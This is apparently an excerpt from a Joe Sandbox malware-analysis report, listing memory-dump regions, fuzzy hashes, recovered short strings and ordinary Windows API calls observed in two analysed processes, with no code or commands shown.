                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: d6fc2492953d5315c475ce5006aef6cda332c8745659c4c22d739452f1ebf152
                                  • Instruction ID: 40f01c6153801922393480b98a4a78aed3310b07af2fd0b881ba845c54ba42e0
                                  • Opcode Fuzzy Hash: d6fc2492953d5315c475ce5006aef6cda332c8745659c4c22d739452f1ebf152
                                  • Instruction Fuzzy Hash: 4C31EF30B102058FDF59AB74D95476E7BE6BF89600F208968D006EB398EE35DD02CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq
                                  • API String ID: 0-2886413773
                                  • Opcode ID: d694617f65e96d6af8ad614da94a0c744c019eccd9c59173e28dafd7518f0a47
                                  • Instruction ID: d9e5ea370389722fffac494f66dc61b5bf00b677657608a38fb48f01d34611df
                                  • Opcode Fuzzy Hash: d694617f65e96d6af8ad614da94a0c744c019eccd9c59173e28dafd7518f0a47
                                  • Instruction Fuzzy Hash: 0FF0FF30B00216CFDF68BF89ED986A8B37AFB40200F200176CA01DB254C739D904CBC4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3279803954.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2b3d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ed5756dce6640289ea31b86242c46e6517f1b035bca482da6b82d9542e4fc64
                                  • Instruction ID: ed46333fdf33c3084436bf546073c3b0d8b0a8ba7ecbf0253c9b18b75af9b856
                                  • Opcode Fuzzy Hash: 5ed5756dce6640289ea31b86242c46e6517f1b035bca482da6b82d9542e4fc64
                                  • Instruction Fuzzy Hash: 27212671504205DFDB16CF24C9D4F26BB65FB88714F20C5ADE9494B352C73AD446CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3279803954.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2b3d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c28b379f34078b0fb9e7720f231786b3e16f46c5383d3b2e7fcf074612322f20
                                  • Instruction ID: 18351c57a51c622b2cf3969fca36ff76e558eb0842dca0d4ecb88fa2dfdfe2b6
                                  • Opcode Fuzzy Hash: c28b379f34078b0fb9e7720f231786b3e16f46c5383d3b2e7fcf074612322f20
                                  • Instruction Fuzzy Hash: 62212671544641DFDB16DF24C9C0F26BF65FB88314F20C6ADE9094B362C33AD886C661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 943d41019faf2cc56394577bcc72b7099549e9190bc2d95a0afc8662e576ca8e
                                  • Instruction ID: 075ed5d4c9d49d56a7141b4cab28446d174ec7860e4ea1010fb84be5d91cb2aa
                                  • Opcode Fuzzy Hash: 943d41019faf2cc56394577bcc72b7099549e9190bc2d95a0afc8662e576ca8e
                                  • Instruction Fuzzy Hash: 7021DF31F105198BCF94EB69ED947AEB7F6EB84310F208525E405EB349EB31EC418B88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 872762adc1f670135fe864cb7435c7cb12a12e94467e2490a76e55acbc40b382
                                  • Instruction ID: 40b403b6ddedae4b1cdbb4b52bf689a90942ad7ec0e706df866486e7447ed60f
                                  • Opcode Fuzzy Hash: 872762adc1f670135fe864cb7435c7cb12a12e94467e2490a76e55acbc40b382
                                  • Instruction Fuzzy Hash: 5A11D071E002288BCF69EF68DD805DEF7B6EF89310F1185A9D406EB204DA319D44DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38f2aa31a31c134258b4aaacaa97ac266e0553d1dc2ffcc224674362728183a1
                                  • Instruction ID: 16601a6bbf95825a990ea984d22d9301f29e6b3d991a5bc3eed208dca2c90e9b
                                  • Opcode Fuzzy Hash: 38f2aa31a31c134258b4aaacaa97ac266e0553d1dc2ffcc224674362728183a1
                                  • Instruction Fuzzy Hash: 76118E35B141298BDF94EA68DC546AE73FAEBCC650F014539D406EB354EE69DC028BD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5c6869fcc867f656a39863f625304feaa953b15d7f001c8ee8f6656cf532aa86
                                  • Instruction ID: 46c57ff0e579ef710dd25375b763388bb9fdb4104090c6e5b700ef9e4ed7a5af
                                  • Opcode Fuzzy Hash: 5c6869fcc867f656a39863f625304feaa953b15d7f001c8ee8f6656cf532aa86
                                  • Instruction Fuzzy Hash: EA01D835B001205FDB62A6BC9C51B6BA7DACBC9610F10847BF41BCB355D924DC1183D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89fc8c88b2ad75180be25570482718afbf439e212e974d60890810b1e688970e
                                  • Instruction ID: 3a8ea65588827962df109ee9e2da07b2e12685a89510395fb84909b1041af345
                                  • Opcode Fuzzy Hash: 89fc8c88b2ad75180be25570482718afbf439e212e974d60890810b1e688970e
                                  • Instruction Fuzzy Hash: 9421AFB5D01269AFCB00DF9AD984ADEFBB4FF49310F10852AE918A7240C379A554CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c4b70741796a9ddae39fb2cceafcf8e07b78239e7ab79f1cbc8ee9a3a1a9465
                                  • Instruction ID: 5d820e98e5646d07dda998c38603c90716fe6808812e686c20bb2dc5a012673f
                                  • Opcode Fuzzy Hash: 6c4b70741796a9ddae39fb2cceafcf8e07b78239e7ab79f1cbc8ee9a3a1a9465
                                  • Instruction Fuzzy Hash: 7B01B130B041116FDB62EA3CAD54BAFABEADB85710F10847AE60ACB255DB25DC028780
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8e08fe264d3c07123dd34689dad55efe772cca15f74b54cd4211f585490b1df
                                  • Instruction ID: c067383d7d86d8b68ee966c57a9db7b6e4fff4a4fbab0978302872365a4e6de4
                                  • Opcode Fuzzy Hash: a8e08fe264d3c07123dd34689dad55efe772cca15f74b54cd4211f585490b1df
                                  • Instruction Fuzzy Hash: 3401B132B100255BDF94AA689D54AEB73EBDFC8610F014239E40AE7354EF289C0247D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3279803954.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2b3d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 98424e7152c88580a8296e016b916926a263cf16f7a6e5d9123e35720a456ccf
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 1B11BB75504284CFCB12CF14C9C4B15BBA2FB88314F24C6A9D8494B252C33AD44ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb723015a69e064f8e91aeed07302f8288da1de27361155a405bced6fe2affd8
                                  • Instruction ID: 3138ce4cf11d6484cecf105c4d5d33b35b367ddb0d003aaee04a149ae6e9c37d
                                  • Opcode Fuzzy Hash: bb723015a69e064f8e91aeed07302f8288da1de27361155a405bced6fe2affd8
                                  • Instruction Fuzzy Hash: 4A11B3B5D01259AFCB00DF9AD984ADEFFB4FB49310F10852AE518A7240C375A554CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3279803954.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2b3d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction ID: 0e6ffa5c8c8ad564bdd2d14a6bc2145faeac7f319a01d655b80c752e526bf142
                                  • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction Fuzzy Hash: 2B119D75504680CFDB16CF14D9C4B15BFA2FB88318F24C6ADD8494B666C33AD88ACB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 439be854a867fbf53d4977657ce938f68c9fa9b5a7503a7ed7f49448294091a5
                                  • Instruction ID: bb3dff5dd51ed7adabfb20a7aa992fe14b45f8a9cf70a2365f03d533d60490e6
                                  • Opcode Fuzzy Hash: 439be854a867fbf53d4977657ce938f68c9fa9b5a7503a7ed7f49448294091a5
                                  • Instruction Fuzzy Hash: E301A234B100205BDB65A6AD9854B1BE6DADBC9710F20847AE51ACB344DD65DC0183D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc52f82ef2d11cd1622b034a8f65a9b3859721fe7d7ac8c29b584c91036512c5
                                  • Instruction ID: f591c30b4fedac42364b116ffebcb24acdf95d7815b4bea67ac93f041521f666
                                  • Opcode Fuzzy Hash: bc52f82ef2d11cd1622b034a8f65a9b3859721fe7d7ac8c29b584c91036512c5
                                  • Instruction Fuzzy Hash: 46012679B000108FCB26EB3CDC5076E67D7DB88624F108829E60ECB344DE24EC0347A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86e1ea1dbbbf1702a9c4dcb25f89ced29bc7d1b8f67c559e29634df6ba972315
                                  • Instruction ID: 21d1027e62e19605035c753763c8b8ef0768657d7b18650a6633f820d6452761
                                  • Opcode Fuzzy Hash: 86e1ea1dbbbf1702a9c4dcb25f89ced29bc7d1b8f67c559e29634df6ba972315
                                  • Instruction Fuzzy Hash: A001AF75B100115FCB66AA7DDC54B2FB7EADBC9A24F108839E60ACB344DE25ED0243E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2b83b1d6ba1447901d0339c49cbbd9df95b90a4020c8af7977a2c8a27724206
                                  • Instruction ID: b1624da05cac302ebcd08760d966e5e3e6e8df21e4fdd71a787df5f63a68364b
                                  • Opcode Fuzzy Hash: c2b83b1d6ba1447901d0339c49cbbd9df95b90a4020c8af7977a2c8a27724206
                                  • Instruction Fuzzy Hash: FE018134B001256FCB61EA7DE954B6EB7EADB89710F108438E60ACB354EF25EC018784
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a28b65504997fb6ec58756b0782932aff1d6f6e539c681e05ed016830ed5ad7e
                                  • Instruction ID: 61691d2cfd55b65929821435327309292db9b0ab02cbe074be4afec8eaa034d7
                                  • Opcode Fuzzy Hash: a28b65504997fb6ec58756b0782932aff1d6f6e539c681e05ed016830ed5ad7e
                                  • Instruction Fuzzy Hash: 1201F735E15264AFCB15AF79EC40B9A7776FB85320F004579E506EB385D7359804CBC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53fc6e892b61d40e8bd74f4bfa0cdcdf5b1cbad8dda4cbf733a6760e4a8d4cfd
                                  • Instruction ID: 7263c8e25c4bccb191504e1a5c9c115c4be9630f305792d4feb91c56291d7b7c
                                  • Opcode Fuzzy Hash: 53fc6e892b61d40e8bd74f4bfa0cdcdf5b1cbad8dda4cbf733a6760e4a8d4cfd
                                  • Instruction Fuzzy Hash: 5D01A931F102249FDF54AE6AEC54A9E7776F785314F104539E906EB344DB31A8048BC4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 87efb6519f56c3cc7b131f1f3ebc5714406bf3c154255657ab5b2f56db5ec7bb
                                  • Instruction ID: 7fc38fff83b40e808a8b567af074151c5017592d32d5885a780a13cd4830303a
                                  • Opcode Fuzzy Hash: 87efb6519f56c3cc7b131f1f3ebc5714406bf3c154255657ab5b2f56db5ec7bb
                                  • Instruction Fuzzy Hash: F9E092709191889EDF51DBB09F6535A3B749B02108F2144F7C444CB143D175CA099340
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b0a2fcb87986961129f151e017e3fe5feaa12096ce5338145710a1fb90bb0c2
                                  • Instruction ID: 2cf3b11682c64adfc7d10209955eac26c23fccb7c040efc9b0116df29b895618
                                  • Opcode Fuzzy Hash: 3b0a2fcb87986961129f151e017e3fe5feaa12096ce5338145710a1fb90bb0c2
                                  • Instruction Fuzzy Hash: F9E0C2B0E10108ABDF50EFB0DF6579E73ACD702204F2084A4D408CB201E176CA059380
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3810553869
                                  • Opcode ID: e04d2e951beaba7ccb467c355716f8467841dd8e0dcba3fb245c4cc6717c4567
                                  • Instruction ID: cbd0f769ab69cba76b561b925fd447de0b3d1d687e73ab8825d927a17bfefdd9
                                  • Opcode Fuzzy Hash: e04d2e951beaba7ccb467c355716f8467841dd8e0dcba3fb245c4cc6717c4567
                                  • Instruction Fuzzy Hash: E5121D30E012198FDB64EF65C994AAEB7B6FF89301F2085A9D405AB364DB31ED45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: ffe2ce6fd468ca0c6b0a535a386bd1f4b35d113d487494d6068b516290ff2cf0
                                  • Instruction ID: a6d96e1bfd76eb3bce6654d229637d91d7dc9a2ebbbf86d217d09f08305d3982
                                  • Opcode Fuzzy Hash: ffe2ce6fd468ca0c6b0a535a386bd1f4b35d113d487494d6068b516290ff2cf0
                                  • Instruction Fuzzy Hash: 77915330A00209EFEB68EF65DE947AE77F6FF84300F248529D501AB294DB74AC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 7292f9b11f0527d92ded0586e4fe11be0623e36cba51474f07a27b22902430ef
                                  • Instruction ID: 9d7d97007a3f4651e7d1c96dc06a8cfc82ac8b3e23ee9ae20d6c166099e0cf28
                                  • Opcode Fuzzy Hash: 7292f9b11f0527d92ded0586e4fe11be0623e36cba51474f07a27b22902430ef
                                  • Instruction Fuzzy Hash: 28F12D30B01219CFDB55EFA5D994A6EB7B7BF84304F248568D406AB368DB35EC42CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: fd9f4736c5064c94472653ab9807e88de4949fb96ca26f7155587b52a592196b
                                  • Instruction ID: 9e1ae3d8d99e11979cb25cb3811983a6c80eb949d5beef876bd283c40a3c2a8e
                                  • Opcode Fuzzy Hash: fd9f4736c5064c94472653ab9807e88de4949fb96ca26f7155587b52a592196b
                                  • Instruction Fuzzy Hash: 98B12D30E102198FDB64EF65D9986AEB7B6FF84314F248939D406AB354DB78DC41CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq$$jq$$jq
                                  • API String ID: 0-2974078839
                                  • Opcode ID: 12fbfb8259fc901c838f4f72cf7fccbb69b03d4e3f4df234fbae0f404cc64bc5
                                  • Instruction ID: 803a81259c84010cd6ef5c38df2d842355b820ea9a86c58c36e1e9e52a6739a0
                                  • Opcode Fuzzy Hash: 12fbfb8259fc901c838f4f72cf7fccbb69b03d4e3f4df234fbae0f404cc64bc5
                                  • Instruction Fuzzy Hash: 0B51A031B002028FDB54EF39D994A6AB7F6FF84340F148668D4069B3A9DB35EC44CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 0195f5a5d08256ca6f9474cd742ddb76bed5162fd34d00543268c49c8c39f4bb
                                  • Instruction ID: a2b798261716c9ca981a7c9cb6f2ce70d332c563f1ae139ef843a71c2ddaba8b
                                  • Opcode Fuzzy Hash: 0195f5a5d08256ca6f9474cd742ddb76bed5162fd34d00543268c49c8c39f4bb
                                  • Instruction Fuzzy Hash: 4B518E30E10218AFDF65EB64D984AAEB7F6EF85301F248529D906EB355DB31EC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:11.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:194
                                  Total number of Limit Nodes:12

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0149D876
                                  • GetCurrentThread.KERNEL32 ref: 0149D8B3
                                  • GetCurrentProcess.KERNEL32 ref: 0149D8F0
                                  • GetCurrentThreadId.KERNEL32 ref: 0149D949
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: b1bee06a9b298e6e55a803787defee116187aaff9e830166fec81c45fa4bb11d
                                  • Instruction ID: c7321b668c16304c6362687c1c9e314cf2386cc8aa13f0f94a3fde60cd2ace9b
                                  • Opcode Fuzzy Hash: b1bee06a9b298e6e55a803787defee116187aaff9e830166fec81c45fa4bb11d
                                  • Instruction Fuzzy Hash: 765125B09003098FDB18DFAAD548BDEBFF5AF88314F20845AE519A7361DB389944CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 099CD4E6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: e2f87264ada33342697c0c167804e0a2fdf5003a17698fd1d5bb9c0b6238541e
                                  • Instruction ID: 17b640a7fca2284c9d875253827037e7b2097714ca16c9debe9acc32290fd81c
                                  • Opcode Fuzzy Hash: e2f87264ada33342697c0c167804e0a2fdf5003a17698fd1d5bb9c0b6238541e
                                  • Instruction Fuzzy Hash: B0A16BB1D00259DFDF14DF68CD51BADBBB2BF48304F14816AE848A7294DB749981CF92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 099CD4E6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: c50ca9ddb20e1a05840bcc528490be48e3208b050a378eea7e401010eeb666da
                                  • Instruction ID: d1668fee3228d203c5e64e66e4a637484d91f5cd4858598789a3bed67d86b294
                                  • Opcode Fuzzy Hash: c50ca9ddb20e1a05840bcc528490be48e3208b050a378eea7e401010eeb666da
                                  • Instruction Fuzzy Hash: EC915AB1D00219DFEF20DF69CC41BADBBB6BF48314F048169E848A7294DB749985CF92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0149B7C6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 4cd9d9a428fdfe06db7dc3131000a48721c37157581859f93c7a980f4bfda3d1
                                  • Instruction ID: a17470273a6b2d0a54191017415a9362aea9f1ff779c749e8c7c314099f64412
                                  • Opcode Fuzzy Hash: 4cd9d9a428fdfe06db7dc3131000a48721c37157581859f93c7a980f4bfda3d1
                                  • Instruction Fuzzy Hash: 5E813570A00B058FDB25DF2AE144B5ABBF5FF88200F148A2ED58AD7B60D774E845CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
